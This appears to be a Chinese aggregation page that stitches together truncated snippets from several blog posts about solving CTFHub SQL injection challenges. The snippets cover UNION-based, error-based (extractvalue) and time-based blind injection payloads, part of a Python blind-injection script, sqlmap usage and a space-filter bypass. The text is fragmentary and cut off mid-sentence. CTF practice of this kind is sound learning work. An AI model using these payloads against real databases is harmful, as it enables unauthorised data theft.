1.确认是字符型注入1'#无回显 1' --+#有回显2.order by确认共有3列1'order by 3 --+ #有回显 1' order by 3 --+#无回显2.union注入,确认显示位-1'union select 1,2,3 --+ #回显2 3 3.获取表名:fl4g,notes -1' union select 1,2,group_concat(table_name) from information_schema.tab...
输入:1 and extractvalue(1,(select group_concat(flag)from flag)) 刚好能直接返回flag,但是把flag的头ctfhub给丢弃了,如果没有前面的步骤,头还得靠猜,所以这种方法只是拓宽一下思路,平时做题的时候还是该干嘛干嘛 sqlmap 说完手注,说说用sqlmap的使用 sqlmap是超级无敌惊天地泣鬼神的强大的工具,所以网络上介绍他...
charAscii = ord(char) #全部大写 url = 'CTFHub 环境实例 | 提示信息 +'and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))--+' urlformat = url.format(i,charAscii) #名的第i个字符,与某个字符比较 start_time = time.time() rsp = requests.get(urlformat,headers=headers)#访问 ...
文章博客地址:[从0到1完全掌握 SQL 注入](https://withd-raw.github.io/2022/03/22/%E4%BB%8E0%E5%88%B01%E5%AE%8C%E5%85%
CTFHub(1) SQL注入题目injection 查看原文 sql注入3之空格过滤 一,空格过滤的十三中脚本,由于本人比较偏爱sqlmap所以,在这里只留下了sql的空格过滤方式。 当然使用/**/代替空格手工注入同样可以。 –tamper “脚本名称” 二,ctfhubsql注入的空格过滤 倒数第二步如下图最后一步如下,...
CTFHub(1)SQL注入题目injection 现分享CTFHub上的一道SQL注入题目injection 方法:使用sqlmap进行注入如下图,可见一个GET传参,可能为SQL注入。 进入sqlmap文件夹,使用sqlmap进行注入。sqlmap运行结果如下 可知存在SQL注入漏洞,使用sqlmap爆出所有数据库sqlmap运行结果如下 由于information_schema为 ...
前言:本人算是三刷 SQL 注入了,最早开始学的时候并没有很好的掌握 SQL 语句。最近再重新刷一遍,巩固一遍知识。 建议使用的配套靶场是 WebGoat、BUUCTF 以及 CTFhub。第一遍学的时候用的是 sqli-labs,但总觉得少了点味道。 0x01 SQL?SQL 注入? 所以到底什么是 SQL?到底什么是 SQL 注入?